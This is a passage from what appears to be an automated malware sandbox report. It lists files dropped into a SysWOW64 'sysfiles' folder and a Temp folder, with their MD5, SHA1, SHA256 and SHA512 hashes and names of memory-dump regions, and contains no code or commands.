SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll

MD5 8e3f59b8c9dfc933fca30edefeb76186
SHA1 37a78089d5936d1bc3b60915971604c611a94dbd
SHA256 528c0656751b336c10cb4c49b703eae9c3863f7f416d0e09b198b082cc54aeb8
SHA512 3224c20c30556774fd4bed78909f451b9a5a46aa59271b5e88b1e0e60145d217802a8f1fda3d3fabcd8546ca7783e0c70f0c419a28efe6c5160a102553a3c91d

C:\Windows\SysWOW64\sysfiles\gdiplus.dll

MD5 871c903a90c45ca08a9d42803916c3f7
SHA1 d962a12bc15bfb4c505bb63f603ca211588958db
SHA256 f1da32183b3da19f75fa4ef0974a64895266b16d119bbb1da9fe63867dba0645
SHA512 985b0b8b5e3d96acfd0514676d9f0c5d2d8f11e31f01acfa0f7da9af3568e12343ca77f541f55edda6a0e5c14fe733bda5dc1c10bb170d40d15b7a60ad000145

C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll

MD5 ff622a8812d8b1eff8f8d1a32087f9d2
SHA1 910615c9374b8734794ac885707ff5370db42ef1
SHA256 1b8fe11c0bdcbf1f4503c478843de02177c606912c89e655e482adec787c2ebf
SHA512 1a7c49f172691bf071df0d47d6ee270afbfa889afb8d5bd893496277fd816630ecd7b50c978b53d88228922ba6070f382b959ffc389394e0f08daab107369931

C:\Windows\SysWOW64\sysfiles\vp8encoder.dll

MD5 c638bca1a67911af7f9ed67e7b501154
SHA1 0fd74d2f1bd78f678b897a776d8bce36742c39b7
SHA256 519078219f7f6db542f747702422f902a21bfc3aef8c6e6c3580e1c5e88162b8
SHA512 ca8133399f61a1f339a14e3fad3bfafc6fe3657801fd66df761c88c18b2dc23ceb02ba6faa536690986972933bec2808254ef143c2c22f881285facb4364659f

C:\Windows\SysWOW64\sysfiles\vp8decoder.dll

MD5 6f6bfe02e84a595a56b456f72debd4ee
SHA1 90bad3ae1746c7a45df2dbf44cd536eb1bf3c8e2
SHA256 5e59b566eda7bb36f3f5d6dd39858bc9d6cf2c8d81deca4ea3c409804247da51
SHA512 ed2a7402699a6d00d1eac52b0f2dea4475173be3320dfbad5ca58877f06638769533229bc12bce6650726d3166c0e5ebac2dad7171b77b29186d4d5e65818c50

C:\Windows\SysWOW64\sysfiles\ripcserver.dll

MD5 30e269f850baf6ca25187815912e21c5
SHA1 eb160de97d12b4e96f350dd0d0126d41d658afb3
SHA256 379191bfd34d41e96760c7a539e2056a22be3d44bf0e8712b53e443f55aead90
SHA512 9b86a4eefdcae46e605f85e752ef61e39fd0212a19b7fd4c35eb3ab99851a0b906d048d12d1e1e985a340a67a64d405b8cf803555865137278f0c19d686df5e7

C:\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6

C:\Windows\SysWOW64\sysfiles\msvcr90.dll

MD5 7538050656fe5d63cb4b80349dd1cfe3
SHA1 f825c40fee87cc9952a61c8c34e9f6eee8da742d
SHA256 e16bc9b66642151de612ee045c2810ca6146975015bd9679a354567f56da2099
SHA512 843e22630254d222dfd12166c701f6cd1dca4a8dc216c7a8c9c0ab1afc90189cfa8b6499bbc46408008a1d985394eb8a660b1fa1991059a65c09e8d6481a3af8

C:\Windows\SysWOW64\sysfiles\msvcp90.dll

MD5 b2eee3dee31f50e082e9c720a6d7757d
SHA1 3322840fef43c92fb55dc31e682d19970daf159d
SHA256 4608beedd8cf9c3fc5ab03716b4ab6f01c7b7d65a7c072af04f514ffb0e02d01
SHA512 8b1854e80045001e7ab3a978fb4aa1de19a3c9fc206013d7bc43aec919f45e46bb7555f667d9f7d7833ab8baa55c9098af8872006ff277fc364a5e6f99ee25d3

memory/1768-436-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

memory/420-437-0x00000000001D0000-0x00000000001F3000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

memory/1200-446-0x0000000000980000-0x0000000000ACA000-memory.dmp

memory/2072-447-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

memory/2844-452-0x00000000009C0000-0x0000000000A2E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wget.exe

MD5 bd126a7b59d5d1f97ba89a3e71425731
SHA1 457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256 a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA512 3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

C:\Users\Admin\AppData\Local\Temp\wget.exe

MD5 bd126a7b59d5d1f97ba89a3e71425731
SHA1 457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256 a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA512 3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

MD5 af74ff71f11cec559a5aaee9a41c9710
SHA1 0df60a0511d2ae122a8e5b736efda1bdf0bee41d
SHA256 66a1f91373099569c354e909757faac87a5d6f00bc7fdd3d9a85e4324bae9a80
SHA512 e8f8b566c9116c42d57dbe6edf20b76b96976f7e5f7c9ba766a6d3e7aa4b49404bb66456e56d25c6623d5a2a963cec19e0dc4a7caa6ed3fe22074b747dffd5e9